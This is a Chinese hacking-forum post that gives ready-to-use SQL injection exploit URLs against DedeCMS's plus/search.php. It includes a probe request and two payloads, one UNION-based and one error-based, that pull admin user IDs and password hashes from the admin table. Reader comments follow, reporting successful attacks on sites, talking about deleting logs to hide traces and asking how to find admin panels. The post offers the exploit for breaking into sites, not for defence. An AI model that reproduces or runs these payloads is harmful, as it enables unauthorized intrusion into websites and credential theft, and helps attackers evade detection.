[通杀]dedecms plus/search.php 注入漏洞利用方式
转载不加作者名的没JJ
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
我一般是这样测试的:
提交 xx.com/plus/search.php?keyword=as&typeArr[1 uNion 1]=a
转载不加作者名的没JJ
作者:鬼哥
看结果如果提示
Safe Alert: Request Error step 2 !
那么直接用下面的exp
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
看结果如果提示
Safe Alert: Request Error step 1 !
那么直接用下面的exp
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
如果正常显示证明漏洞不存在了。
转载不加作者名的没JJ
评论102次
好基友 呵呵 直接通过日志查exp啊
好帖顶起。。。。
过期了吧
原来有日志记录的啊 , 表示看到的晚了 悲剧啊
好东西 不过得删除日志
鬼哥这东西,最实用。
内网测试2次成功
拿回家测试测试~~忽忽~
有没有爆后台路径的方法
显示字节长度不对
后台很多都改的 比较难
赞个, dedecms 还是很危险啊
很给力 测试成功
我晕,利用方式居然在这里,我还傻XX的去别的地方找。。。。。
不错收下了~嘿
嘿嘿 。。。。终于公布出来。。
收藏了 有是dede 悲剧
测试成功,谢谢
测试了几个不成功。可能版本问题吧。
支持原创